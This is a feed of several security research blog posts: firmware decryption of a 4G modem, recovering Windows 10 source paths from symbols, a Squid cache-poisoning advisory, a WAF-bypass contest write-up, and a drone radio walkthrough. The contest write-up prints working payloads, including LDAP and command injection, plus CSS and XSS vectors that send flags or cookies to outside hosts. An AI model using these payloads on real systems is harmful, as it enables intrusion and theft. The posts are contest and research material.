Quantcast
Channel: Positive Technologies - learn and secure
Viewing all 198 articles
Browse latest View live

Decipher Updates of a Popular 4G Modem: Dmitry Sklyarov’s Method

$
0
0

What could a reverse engineer do if trying to examine device code he couldn’t find anything except encrypted firmware files? Here is a real story how to meet the challenge with basic knowledge of computer science and mere logic.

We do not specify the modem vendor or exact names of the files deliberately — this article focuses on the challenge and an interesting approach to the solution. This method is not applicable to the latest models of the modem, but it might work with older ones and other vendors.

1. Identifying the structure

At first, we identify the structure of the firmware files. There are three update versions for the same modem:

  • v2.8_image.bin
  • v3.7_image.bin
  • v3.7.4_image.bin

The structure of all the files has the TLV (Tag-Length-Value) format. For instance, for v3.7.4_image.bin it looks as follows:


The values are all Little-endian, Tag is 16 bit long, Length is 32 bits.

Tag 0x7240 is located at the first nesting level, and its data occupies the whole file. Tag 0x0003 (0x0A bytes) takes the second level (inside the data of tag 0x7240); tag 0x0000 (0x4BDE0E bytes) goes next, then 0x0001 and 0x0002 (they didn’t fit in the screenshot). The third level (within the data of tag 0x0003) encapsulates tag 0x0002 that stores four-byte version number of the 030704FF file (3.7.4 if FF is skipped).

Other tags located at the second nesting level (0x0000, 0x0001, and 0x0002) store descriptions of separate files “packaged” in a single firmware file.

Each file has a name (tag 0x0001), flags (tag 0x0002), size (tag 0x0003), 16-byte value (tag 0x0004), and file data (tag 0x0005).

The following structure comes as a result of parsing the whole scope of the tags:


So it is possible to retrieve encrypted data for all the components (CPUImage, AutoInstall, and WebUI) from the firmware files. AutoInstall turned out to be the same for all three firmware versions, WebUI contents were the same for v3.7 and v3.7.4, and CPUImage was unique in every version.

2. Guesswork by algorithms

Tag 0x0004 at the third nesting level contains a 16-byte data set with high entropy. It might be a hash value, and the most popular 128-bit hash is MD5.

In the retrieved files, many bytes have the same values at the same offset. Below is the beginning of two files (differences are highlighted):


However, if you try to find the same sequences within a single file, there won’t be any long repeats.
This looks like a result of applying a constant semi-random gamma as long as the message. RC4 is the most popular cryptographic algorithm that functions this way.

3. Attacking a stream cipher with a constant key

If several messages are encrypted with the same key (i.e. gamma), XORing them may reveal their fragments: zero bytes will return plaintext.

The files AutoInstall and WebUI give interesting results:

00000000: EB 3C 90 6D 6B 64 6F 73 66 73 00 00 02 04 01 00  л<ђmkdosfs  ☻♦☺
00000010: 02 00 02 F8 0F F8 03 00 20 00 40 00 00 00 00 00  ☻ ☻ш☼ш♥   @
00000020: 00 00 00 00 00 00 29 6E 1F 3B 15 47 43 54 2D 4C        )n▼;§GCT-L
00000030: 54 45 20 20 20 20 46 41 54 31 32 20 20 20 0E 1F  TE    FAT12   ♫▼
00000040: BE 5B 7C AC 22 C0 74 0B 56 B4 0E BB 07 00 CD 10  ѕ[|¬"Аt♂Vґ♫»• Н►
00000050: 5E EB F0 32 E4 CD 16 CD 19 EB FE 54 68 69 73 20  ^лр2дН▬Н↓люThis
00000060: 69 73 20 6E 6F 74 20 61 20 62 6F 6F 74 61 62 6C  is not a bootabl
00000070: 65 20 64 69 73 6B 2E 20 20 50 6C 65 61 73 65 20  e disk.  Please
00000080: 69 6E 73 65 72 74 20 61 20 62 6F 6F 74 61 62 6C  insert a bootabl
00000090: 65 20 66 6C 6F 70 70 79 20 61 6E 64 0D 0A 70 72  e floppy and♪◙pr
000000A0: 65 73 73 20 61 6E 79 20 6B 65 79 20 74 6F 20 74  ess any key to t
000000B0: 72 79 20 61 67 61 69 6E 20 2E 2E 2E 20 0D 0A 00  ry again ... ♪◙
000000C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
00008800: 02 43 44 30 30 31 01 00 00 20 00 20 00 20 00 20  ☻CD001☺
00008810: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20

These two fragments suggest one file is the image of an FAT12 floppy disk, the other — a CD-ROM image.

4. Retrieving first gamma bits

For installation of drivers or supplemental software, modern cellular modems tend to create a virtual CD-ROM upon connection. The same concept is used in this case.

However, when the modem connects to up-to-date operating systems (Windows 7/8, Linux, MacOS X), the CD-ROM either does not appear at all or shows up for a second and then disappears. On a Windows XP laptop manufactured in 2002 and found specifically for the test, the CD-ROM shows up for the whole five seconds — quite enough to read all logical volume sectors and obtain an image, whose size is 606,208 = 0x94000 bytes and corresponds to the size of the AutoInstall file. The MD5 value of the image is 897279F34B7629801D839A3E18DA0345, which equals to the value of tag 0x0004.

Now we only need to XOR the AutoInstall file with the known CD-ROM image and obtain the gamma’s first 600 kB. This gamma can be used to decrypt the beginning of the files CPUImage and WebUI (as long as 4,971,976 and 2,093,056 bytes respectively).

5. Restructuring an FDD image

If you decipher the beginning (first 606,208 bytes) and zero-fill the rest of the WebUI file, and then interpret everything as an FAT image, you will see the file system structure and the contents of some files:

          Name           | Size |  Date  |Time
bru                      |Folder|31.05.12|22:17
cgi-bin                  |Folder|31.05.12|22:17
cors                     |Folder|31.05.12|22:17
css                      |Folder|31.05.12|22:17
eng                      |Folder|31.05.12|22:17
img                      |Folder|31.05.12|22:17
js                       |Folder|31.05.12|22:17
ru                       |Folder|31.05.12|22:17
name.html                |  2248|31.05.12|22:17
easyXDM.js               |101924|31.05.12|22:17
easyXDM.debug.js         |113900|31.05.12|22:17
easyXDM.min.js           | 19863|31.05.12|22:17
easyXDM.Widgets.js       | 11134|31.05.12|22:17
easyXDM.Widgets.debug.js | 11134|31.05.12|22:17
easyXDM.Widgets.min.js   |  3114|31.05.12|22:17
json2.js                 | 17382|31.05.12|22:17
easyxdm.swf              |  1758|31.05.12|22:17
MIT-license.txt          |  1102|31.05.12|22:17

If your modem is connected and you browse to the address http:///dir, you will see the same file system and will be able to download any file.

To restore the WebUI image, you need to place the files downloaded via the web interface in accordance with the boot, FAT table, and directory description data. The only difficulty is the ru sub-folder in the root directory. A cluster with folder content descriptions is out of the first 606,208 bytes, so its contents should be restored individually.

According to the web interface data, the ru directory must include the following files:

          Name           | Size |  Date  |Time
Manualupdate.html        |  3981|31.05.12|22:17
Index.html               |  5327|31.05.12|22:17
Network.html             |  3328|31.05.12|22:17

Fortunately, there is the eng folder in the root directory that contains files with the same names and creation dates. To obtain correct data for the ru folder, the following should be changed:

  • The number of the starting cluster of the current directory
  • The size of each file
  • The numbers of the starting clusters of all files

The root directory has the number of the cluster of the ru directory (0x213).
Use your web interface to learn the file sizes (3981 = 0xF8D, 5327 = 0x14CF, and 3328 = 0xD00 respectively).

The numbers of the starting clusters must be guessed, but that is easy. According to the boot data, each cluster occupies four sectors or 2,048 bytes. The ru directory requires one cluster only, the files Manualupdate.html and Network.html — two clusters, Index.html — three clusters. Since clusters are written on an empty disk sequentially, files will start in clusters 0x214, 0x216, and 0x219 respectively. Restored data for the ru directory are as follows:

00000000: 2E 20 20 20 20 20 20 20 20 20 20 10 00 00 2C AA  .          ►  ,к
00000010: BF 40 BF 40 00 00 2C AA BF 40 13 02 00 00 00 00  ┐@┐@  ,к┐@‼☻
00000020: 2E 2E 20 20 20 20 20 20 20 20 20 10 00 00 2C AA  ..         ►  ,к
00000030: BF 40 BF 40 00 00 2C AA BF 40 00 00 00 00 00 00  ┐@┐@  ,к┐@
00000040: 42 68 00 74 00 6D 00 6C 00 00 00 0F 00 56 FF FF  Bh t m l   ☼ V  
00000050: FF FF FF FF FF FF FF FF FF FF 00 00 FF FF FF FF                  
00000060: 01 6D 00 61 00 6E 00 75 00 61 00 0F 00 56 6C 00  ☺m a n u a ☼ Vl
00000070: 75 00 70 00 64 00 61 00 74 00 00 00 65 00 2E 00  u p d a t   e .
00000080: 4D 41 4E 55 41 4C 7E 31 48 54 4D 20 00 00 2C AA  MANUAL~1HTM   ,к
00000090: BF 40 BF 40 00 00 2C AA BF 40 14 02 8D 0F 00 00  ┐@┐@  ,к┐@¶☻Н☼
000000A0: 41 69 00 6E 00 64 00 65 00 78 00 0F 00 33 2E 00  Ai n d e x ☼ 3.
000000B0: 68 00 74 00 6D 00 6C 00 00 00 00 00 FF FF FF FF  h t m l         
000000C0: 49 4E 44 45 58 7E 31 20 48 54 4D 20 00 00 2C AA  INDEX~1 HTM   ,к
000000D0: BF 40 BF 40 00 00 2C AA BF 40 16 02 CF 14 00 00  ┐@┐@  ,к┐@▬☻╧¶
000000E0: 41 6E 00 65 00 74 00 77 00 6F 00 0F 00 98 72 00  An e t w o ☼ Шr
000000F0: 6B 00 2E 00 68 00 74 00 6D 00 00 00 6C 00 00 00  k . h t m   l
00000100: 4E 45 54 57 4F 52 7E 31 48 54 4D 20 00 00 2C AA  NETWOR~1HTM   ,к
00000110: BF 40 BF 40 00 00 2C AA BF 40 19 02 00 0D 00 00  ┐@┐@  ,к┐@↓☻ ♪
00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Having burnt a disk image with the ru folder and all file contents (the first cluster corresponds to sector 0x23), we now have a plaintext version of the WebUI file, whose MD5 matches 48D1C3194E45472D28ABFBEB6BBF1CC6 from the firmware file header.

Therefore, we have the AutoInstall and WebUI files deciphered and we know gamma’s first 2,093,056 bytes.

6. Checking CPUImage

It is reasonable to start a disassembler when we have decrypted the first 2 MB of CPUImage. After identifying the processor’s command system (ARM Little-Endian), base download address (the first 0x34C bytes must be skipped) and finding update deciphering location, the following code is available:

ROM:0008ADD0 loc_8ADD0 
ROM:0008ADD0                 LDR             R1, =byte_2ADC60
ROM:0008ADD4                 LDRB            R2, [R1,R0]
ROM:0008ADD8                 LDRB            R1, [R4]
ROM:0008ADDC                 ADD             R0, R0, #1
ROM:0008ADE0                 ADD             R2, R2, R1
ROM:0008ADE4                 ADD             R2, R2, R6
ROM:0008ADE8                 AND             R6, R2, #0xFF
ROM:0008ADEC                 LDRB            R2, [R10,R6]
ROM:0008ADF0                 STRB            R2, [R4],#1
ROM:0008ADF4                 STRB            R1, [R10,R6]
ROM:0008ADF8                 MOV             R1, #0x15
ROM:0008ADFC                 BL              sub_27C0EC
ROM:0008AE00                 SUBS            R11, R11, #1
ROM:0008AE04                 AND             R0, R1, #0xFF
ROM:0008AE08                 BNE             loc_8ADD0

This is how the encryption key located at 0x2ADC60 and as long as 0x15 bytes is loaded to the RC4 algorithm. But 0x2ADC60 = 2,808,928, so the key is beyond the gamma we know.

In earlier firmware versions (3.7 and 2.8), the key is also outside the decrypted area (0x2AD70C and 0x2A852C respectively).

7. XORing again

If XORing CPUImage v3.7 and CPUImage v3.7.4, we obtain the string “SungKook "James" Shin” at the address 0x34C + 0x2AD70C = 0x2ADA58. This is the RC4 key used to encrypt all update files.

Now we only need to make sure that the RC4 gamma matches the gamma obtained earlier and CPUImage MD5 matches the value of the firmware file header.

Now we can examine the firmware itself, but this is quite a different story.

Author: Dmitry Sklyarov, Positive Research

From Telemetry to Open Source: an Overview of Windows 10 Source Tree

$
0
0

There is a lot of internal information available about Microsoft software, despite the fact that it is closed-source. For example, export of library functions by names, which provides some information on the interfaces used. Debugging symbols used for troubleshooting of operating system errors are publicly available; however, there are only compiled binary modules at hand. In this article, we will try to determine what they looked like prior to compilation using only legal methods. 

Raising this question is not new, as Mark Russinovich and Alex Ionescu did this before; however, my research was more detailed. What we need is debugging symbol packages, which are publically available, in this case — the most recent release of Windows 10 (64 bit), both free and checked builds.

Debugging symbols are a set of .pdb (program database) files that keep various information used for debugging purposes of Windows binary modules including names for globals, functions, and data structures, sometimes even with field names.

We can also use information from an almost-publicly-available checked build of Windows 10. This kind of build is full of debugging assertions that contain sensitive information about local variable names and even source line numbers.



The example above, while not providing an absolute path, does expose extremely helpful path information. 

If we feed debugging symbols to the "strings" utility by Sysinternals, we get around 13 GB of raw data. However, repeating this with Windows installation files is a bad idea because it would generate useless data. Therefore, we limit target file types with the following list: exe — executable files, sys — drivers, dll — libraries, ocx — ActiveX components, cpl — control panel elements, efi — EFI applications, in particular, the bootloader. Then we get additional 5.3 GB of raw data. I was initially surprised that there were so few programs that can open gigabytes-large files and even fewer programs that can search for specific data inside those files. I used 010 Editor for manual operations on the raw and temporary data and python scripts for automated data filtering.

Filtering Symbol Data

The symbol file contains a list of object files used for linking of a corresponding executable image. Object file paths are absolute.


  • Filtering clue No. 1: find strings using the mask ":\\".

We are able to get the absolute paths, sort them and remove duplicates, and due to the low volume of junk data, it can be removed manually. These results indicate the source tree structure. The root directory is "d:\th", which may stand for threshold, part of the name of the November release of Windows 10 — Threshold 1. However, we only get a few filenames starting with "d:\th". This is because the linker uses already compiled files as an input. Source files are compiled into the folders "d:\th.obj.amd64fre" for the release or free version of Windows and "d:\th.obj.amd64chk" for the checked or debug version.
  • Filtering clue No. 2: assuming that source files are stored as the corresponding object files after compilation, we can “decompile” object files back to the source ones. Please note that this step can produce an inaccurate structure in the source tree because we don't know for certain the compilation options used.
For example: 

d:\th.obj.amd64fre\shell\osshell\games\freecell\objfre\amd64\freecellgame.obj

turns into

d:\th\shell\osshell\games\freecell\freecellgame.c??

As for the file extensions, an object file can be produced from a range of different file types like "c", "cpp", "cxx", etc. and there is no way to identify the type of a source file, so we leave the "c??" extension.

There are a lot of different root directories, not only "d:\th". Others include "d:\th.public.chk" and "d:\th.public.fre", however, we shall omit these because they are just placeholders for publicly available SDKs. We also note there are many driver projects, which are seemingly built at developers' workplaces:

c:\users\joseph-liu\desktop\sources\rtl819xp_src\common\objfre_win7_amd64\amd64\eeprom.obj
C:\ALLPROJECTS\SW_MODEM\pcm\amd64\pcm.lib
C:\Palau\palau_10.4.292.0\sw\host\drivers\becndis\inbox\WS10\sandbox\Debug\x64\eth_tx.obj
C:\Users\avarde\Desktop\inbox\working\Contents\Sources\wl\sys\amd64\bcmwl63a\bcmwl63a\x64\Windows8Debug\nicpci.obj

There is a standard set of drivers for the devices that are compatible with public specifications, such as USB XHCI controllers, which is a part of a Windows source tree, while all vendor-specific drivers are built somewhere else.
  • Filtering clue No. 3: remove binary files, because we are only interested in source ones. Remove "pdb", "exp", "lib"; "res" files can be reverted to the original "rc" (resource compiler) files.

While this output is neat, we cannot get any additional information about source files from this step, so we must work with the next data set. 

Filtering Raw Binaries Data

As there are only a few absolute filenames in this data set, we will use the following extensions as a filter:
  • "c" — C sources
  • "cpp" — C++ sources
  • "cxx" — C or C++ sources
  • "h" — C header
  • "hpp" — C++ header
  • "hxx" — C or C++ header
  • "asm" — assembly source (MASM)
  • "inc" — assembly header (MASM)
  • "def" — module definition file
After the data is filtered, we can see that even though the filenames are not absolute, they are relative to the "d:\th" root, so we just add the "d:\th" string to all of the resulting filenames.

At this stage, there are problems with the filtered data. The first problem: we are not sure that object file paths were properly reverted to the source files paths.
  • Filtering clue No. 4: let's check if there are matching filepaths between filtered symbol data and filtered data from binaries.
They do match, so that means that we properly restored most of the directory structure for the source tree. There are some folders that might not be properly restored, but this level of inaccuracy is acceptable. We can also replace the "c??" extensions with a matching filepaths extensions.

The second problem is header files. Although a header file is a very important part of a source tree, it is not compiled into an object file. This means that we can't restore the information about header files from object files, so we can only locate and restore header files that were found in the raw data from binaries.

The third problem is that we still don't know the extensions for the most source files.
  • Filtering clue No. 5: assume that a directory contains source files of the same type.
This means that if a directory already contains the "cpp" source file, it is likely that all the other files in the same folder will be "cpp" sources.


  • Filtering clue No. 6: use external sources of information for detail specification.
I used Windows Research Kernel as a reference to the assembler sources and renamed some assembly sources by hand.

Inspecting the Result Data

A keyword search in the source filenames for "telemetry" resulted in 424 hits, the most interesting of which are listed below.

d:\th\admin\enterprisemgmt\enterprisecsps\v2\certificatecore\certificatestoretelemetry.cpp
d:\th\base\appcompat\appraiser\heads\telemetry\telemetryappraiser.cpp
d:\th\base\appmodel\search\common\telemetry\telemetry.cpp
d:\th\base\diagnosis\feedback\siuf\libs\telemetry\siufdatacustom.c??
d:\th\base\diagnosis\pdui\de\wizard\wizardtelemetryprovider.c??
d:\th\base\enterpriseclientsync\settingsync\azure\lib\azuresettingsyncprovidertelemetry.cpp
d:\th\base\fs\exfat\telemetry.c
d:\th\base\fs\fastfat\telemetry.c
d:\th\base\fs\udfs\telemetry.c
d:\th\base\power\energy\platformtelemetry.c??
d:\th\base\power\energy\sleepstudytelemetry.c??
d:\th\base\stor\vds\diskpart\diskparttelemetry.c??
d:\th\base\stor\vds\diskraid\diskraidtelemetry.cpp
d:\th\base\win32\winnls\els\advancedservices\spelling\platformspecific\current\spellingtelemetry.c??
d:\th\drivers\input\hid\hidcore\hidclass\telemetry.h
d:\th\drivers\mobilepc\location\product\core\crowdsource\locationoriontelemetry.cpp
d:\th\drivers\mobilepc\sensors\common\helpers\sensorstelemetry.cpp
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\bthtelemetry.c??
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\fingerprintcollector.c??
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\localradiocollector.c??
d:\th\drivers\wdm\usb\telemetry\registry.c??
d:\th\drivers\wdm\usb\telemetry\telemetry.c??
d:\th\ds\dns\server\server\dnsexe\dnstelemetry.c??
d:\th\ds\ext\live\identity\lib\tracing\lite\microsoftaccounttelemetry.c??
d:\th\ds\security\base\lsa\server\cfiles\telemetry.c
d:\th\ds\security\protocols\msv_sspi\dll\ntlmtelemetry.c??
d:\th\ds\security\protocols\ssl\telemetry\telemetry.c??
d:\th\ds\security\protocols\sspcommon\ssptelemetry.c??
d:\th\enduser\windowsupdate\client\installagent\common\commontelemetry.cpp
d:\th\enduser\winstore\licensemanager\lib\telemetry.cpp
d:\th\minio\ndis\sys\mp\ndistelemetry.c??
d:\th\minio\security\base\lsa\security\driver\telemetry.cxx
d:\th\minkernel\fs\cdfs\telemetry.c
d:\th\minkernel\fs\ntfs\mp\telemetry.c??
d:\th\minkernel\fs\refs\mp\telemetry.c??
d:\th\net\netio\iphlpsvc\service\teredo_telemetry.c
d:\th\net\peernetng\torino\telemetry\notelemetry\peerdistnotelemetry.c??
d:\th\net\rras\ip\nathlp\dhcp\telemetryutils.c??
d:\th\net\winrt\networking\src\sockets\socketstelemetry.h
d:\th\shell\cortana\cortanaui\src\telemetrymanager.cpp
d:\th\shell\explorer\traynotificationareatelemetry.h
d:\th\shell\explorerframe\dll\ribbontelemetry.c??
d:\th\shell\fileexplorer\product\fileexplorertelemetry.c??
d:\th\shell\osshell\control\scrnsave\default\screensavertelemetryc.c??
d:\th\windows\moderncore\inputv2\inputprocessors\devices\keyboard\lib\keyboardprocessortelemetry.c??
d:\th\windows\published\main\touchtelemetry.h
d:\th\xbox\onecore\connectedstorage\service\lib\connectedstoragetelemetryevents.cpp
d:\th\xbox\shellui\common\xbox.shell.data\telemetryutil.c??

These results don’t generate additional information about the telemetry internals, but they do provide an interesting starting point for a more detailed research. 

I next found PatchGuard, but the source tree contains only one file of an unknown type (most likely binary).

d:\th\minkernel\ntos\ke\patchgd.wmp

Searching the unfiltered data reveals that PatchGuard is in fact a separate project.

d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen00.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen01.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen02.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen03.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen04.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen05.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen06.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen07.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen08.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen09.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgd.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda2.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda3.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda4.c??

I also searched for random phrases and words. Some interesting results are provided below:

d:\th\windows\core\ntgdi\fondrv\otfd\atmdrvr\umlib\backdoor.c??
d:\th\inetcore\edgehtml\src\site\webaudio\opensource\wtf\wtfvector.h
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libjpeg\jaricom.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libpng\png.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libtiff\tif_compress.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\zlib\deflate.c??

You are invited to check Windows 10 source tree at Github and share your findings.

Author: Artem Shishkin, Positive Research

“Squoison” Attack: High-severity Vulnerability in Squid Proxy Server Allows Cache Poisoning

$
0
0


Jianjun Chen, a postgraduate student at Tsinghua University, discovered a critical vulnerability in the popular Squid proxy server.  He found that the system fails to conform to the RFC 7230 standard and is not capable of parsing/processing the Host header in HTTP requests properly. This allows attackers to conduct a Cache Poisoning attack using a specially crafted malicious packet.

What is the problem?

The researcher managed to execute a Cache Poisoning attack targeting any unencrypted HTTP requests in Squid-3.5.12. For successful exploitation, an attacker must be able to send requests to some website (like attack.com) through the proxy server. Under this scenario, the attacker first establishes a TCP connection with the attack.com web server. As far as Squid works in transparent proxy mode, these requests are intercepted and transmitted further. At the next stage, the attacker initiates the following HTTP request:

GET http://victim.com/ HTTP/1.1
Host: attack.com 

The cache module uses the host address from the request string (victim.com) to create the key; however, the verification module uses the Host header (attack.com) to check the communication between the host and the IP address. This is what makes the attack possible.

The researcher has also published a video demonstration of the attack.

Such attacks can be carried out remotely using Flash ads. The consequences of this vulnerability can be severe because many Internet providers use Squid as a transparent proxy.

Early on, the Squid developers considered that the detected vulnerability is the same with CVE-2009-0801. Still the Chinese security expert has proven that this new attack is not related to the recent vulnerability. In the case of CVE-2009-0801, an attacker could perform a SOP bypass attack: the issue was caused by improper processing of the destination IP address. The issue has been fixed since the new 3.3 version of Squid. The newly detected vulnerability in Squid 3.5 is caused by inconsistent operation of route verification and cache modules.

How to Protect Yourself

The vulnerability was already fixed but there is still no CVE for the issue or patched version of Squid available. The bug fix is included only in the daily builds for 4 and 3.5 versions.

Positive Technologies experts recommend enabling the host_verify_strict option disabled by default and using the Suricata IDS rule to detect exploitation attempts:

PHDays VI: WAF Bypass Contest

$
0
0

The WAF Bypass competition, now an annual event held during Positive Hack Days, an international forum on information security, was organized in May this year as well. The contest’s participants attempted to bypass the security checks of PT Application Firewall that protected vulnerable applications. Positive Technologies specialists had introduced configuration errors that allowed some bypassing of the system.

The goal of each task was to retrieve a flag stored in a database, file system or in cookies given to a special bot. Below is description and solutions of the contest’s tasks.


1. m0n0l1th

In this task, participants performed an LDAP injection to retrieve the admin password from the LDAP storage. There was a form with an input for a username, which passed directly into an LDAP query.


Standard vectors such as admin)(|(password=*) were blocked by regular expressions, however, it was possible to bypass the block by adding spaces between operands in the query:

admin)(%0a|(password=*)

Further, to obtain the password a contestant needed to bruteforce each character:

admin)(%0a|(password=a*)
admin)(%0a|(password=a3*)
admin)(%0a|(password=a3b*)
admin)(%0a|(password=a3b8*)
admin)(%0a|(password=a3b8b*)
admin)(%0a|(password=a3b8ba*)
...

2. p0tat0

Upon opening the task, a contestant viewed the following page:


A relevant piece of the HTML code was as follows:


There are several key points in the above HTML. First of all, DOCTYPE declares transitional HTML syntax, which allows lax CSS parsing. Secondly, there is a flag between the link and the script tags which are not separated with line breaks.

It may seem that there is no way for an attacker to affect the static page, however if one sends a request such as /index.php/test, they will see that the path is reflected in both link and script tags. And instead of a 404 error, the same page is returned. This happens due to features of the Apache web server (although some other web servers behave the same way).

The first thing to try in such case is definitely XSS, but any quotes and opening tags were escaped. To solve this task, another method should be applied, specifically Relative Path Overwrite (RPO). RPO exploits lax CSS parsing in browsers, which forces the victim to correctly interpret a CSS style injection in an HTML document. Those CSS styles can be used to send user personal data to a remote server. The injection vector was as follows:

/index.php/%250a*%7B%7D%250abody%7Bbackground:red%7D%250a/

Upon sending this request, the browser loads the CSS style via:

/index.php/%0a*{}%0abody{background:red}%0a//../styles.css

The browser detects valid CSS styles in the HTML code it receives in response:



An exploit for this task involves the use of CSS properties that allow sending of a flag to a remote server located between the two fragments of the text under the control of the attacker. Example:

/index.php/')%7D%250a%250a*%7B%7D%250abody%7Bbackground:url('http://test.com/

However, the contest prohibited the use of CSS property keywords that trigger a request to another website: import, content, image, background, font.

While the above restrictions impose some limits, there are several other CSS properties that leak requests. If you look at all of the known methods listed in the project HTTP Leaks, and notice that there is an HTML list in the source code, you will easily determine that the following vector is not blocked:

/index.php/')%7D%250a%250a*%7B%7D%250abody%7Blist-style:url('http://test.com/

Such a request forces a bot based on PhantomJS to send a flag:


3. d3rr0r1m

The contest WAF Bypass usually includes a task on bypassing XXE. This year no one managed to bypass our checks or find a bypass method. Any injections (via common entities, parameter entities, DOCTYPE, etc.) were blocked, however if a contestant encoded the body in UTF-16 Big Endian via the command cat x.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml and removed a BOM, they would be able to bypass the check and read a flag from the file system.


4. f0dn3

In this task, a participant had access to a simple ToDo manager that was able to save and restore a to-do list from the file:


In HEX view a serialized Java object could be recognized (notice magic bytes 0xac 0xed at the beginning).


Deserializing user-supplied Java objects can lead to the execution of arbitrary commands on a server if there are vulnerable libraries. We deliberately included vulnerable commons-collections 4 in CLASSPATH, which allowed a contestant to perform RCE. However, on the PT Application Firewall, we banned two strings that were present in the exploits generated with ysoserial, a tool commonly used for the exploitation of this vulnerability. The first string is “ysoserial” itself and the second one is “iTransformers”, which is present in three ysoserial exploits out of five. To solve the task a participant needed to rename classes and package names, delete the string ysoserial, and at the same time use one of the exploits without the string iTransformers.


5. n0ctf

A simple ping service with an input for IP address was on the task’s page. Many contestants began by inserting a quote, and user data passed directly into the system command call. Although most command structures were blocked, the following vectors bypassed the checks:

8.8.8.8|${IFS}cat /etc/flag
-c 1 ya.ru;/*in/cat /etc/flag
1.2.3.4|${a-cat /etc/flag}

6. c1tyf

To solve this task, contestants needed to bypass the Cross-Site Scripting check in the context of JavaScript code. The protection algorithm was described by Arseny Reutov and Denis Kolegov in the talk “Waf.js: How to protect web applications with JavaScript” that was held at Positive Hack Days VI. In a nutshell, the algorithm inserts user data in different contexts and tries to parse the string as JavaScript code. If an AST is built and it contains restricted nodes, then we block such request. For example, the simplest vector "+alert(1)+" will be blocked, because after substitution in the context with double quotes, a forbidden CallExpression node appears in the AST. However, for the competition, the WithStatement node was not included in the list of forbidden nodes, which allowed bypassing the check by using the following vector:

http://c1tyf.waf-bypass.phdays.com/?name=\"};with(window){onload=function(){ with(document){k=cookie;};with(window){location='http://robotsfreedom.com/phdays/?a=test'%2bk;};}}//;

Results

Three years in a row, the winner is George Noseevich (@webpentest), he received an iPad Air 2, and the second place went to Ivan Novikov (d0znpp), he got a one-year license for Burp Suite Pro. Vladas Bulavas (vladvis) came in third.

During the contest 31,412 requests were blocked.

The number of attacks of different types:


The number of attacks within the individual tasks:




Thanks to the prize winners and all the participants!

The contest was created by Arseny Reutov, (Raz0r), Igor Kanygin (akamajoris), Dmitry Nagibin, Denis Kolegov, Nikolay Tkachenko, Pavel Sviridov and the PT Application Firewall Team.

PHD VI: How They Stole Our Drone

$
0
0

This year, a new competition was introduced at PHDays, where anyone could try to take control over a Syma X5C quadcopter. Manufacturers often believe that if they implement a wireless standard instead of IP technology, they may not think about security. As if hackers would give up because dealing with something other than IP is too long, difficult, and expensive.

But in fact, SDR (software-defined radio) is an excellent way to access the IoT, where the initial level is determined by the level of an IoT vendor’s care and concern. However, even without SDR you can work wonders, even in the limited space of frequencies and protocols.

The contest goal is to take control over a drone.

Inputs:

  • drone control range: 2.4 GHz ISM,
  • control is driven by the module nRF24L01+ (actually, by its clone — BK2423).

Facilities (optional): Arduino Nano, nRF24L01+.

The hijacker received the Syma X8C as a prize.

Since those who wanted to steal our drone were trained people who had HackRF, BladeRF, and other serious tools in their arsenal, we describe two hijack methods: via SDR and nRF24L01+.

The Way of the Samurai: SDR

First of all, you need to find channels that are running the console. But before that, you need to skip through the data sheet, to get the idea of what you need to look for. First of all, we need to find out the organization of frequencies.


Now we know that there are a total of 126 channels with a step of 1 MHz. It'll be also useful to know the width of a channel and its bit rate.


Actually, a participant could manage the task without this knowledge, because it’s not necessarily known what a transmitter consists of. Now we launch a spectrum scanner. We use UmTRX and its maximum bandwidth of 13 MHz.





We do not provide sequential screenshots of each step, but it should be clear how to find such data in radio waves. We can see that, at certain intervals, data appear on channels 25, 41, 57, and 73.

Despite the fact that the data sheet clearly indicates modulation, in real life we do not always have a data sheet for a device. So we build a simple flowgraph in GNU Radio and add detected channels there.



The bandwidth <= 800 KHz according to the data sheet, which means that bit rate is 250 kbps.

Now, to look at the recorded data, we run baudline and open the added file with correct parameters, and this is what we see:


Select one of the highlighted peaks and open the waveform window.


Above we see the recorded signal. Looks like we've done everything correctly, and due to the phase transition it becomes clear that it is FSK/GFSK modulation.

Next, we need to put a demodulator and filter unnecessary data.


The picture looks different now, we choose the dark stripe and open the waveform window.


In fact, the task is solved: the high level is 1, the low level is 0. We can determine the impulse period and calculate the bit rate according to the timeline.

At the very beginning, the transmitter tuned to the transmission frequency and transmits the sound carrier, followed by a preamble consisting of a sequence of 0 and 1, which may differ both in length and content in different chips: in nRF24L01+ it is 1 byte 0xAA or 0x55, depending on the address MSB, in this case, the preamble is 0xAA. Then follows address bytes: in nRF24L01+ address can can consist from 3 to 5 bytes (leaping ahead: this isn't entirely true).


Now we know the address (0xa20009890f). For further analysis, we need to do some automation, like this, for example:



The output is a file consisting of a sequence of 0 and 1:

$ hexdump -C test3.raw

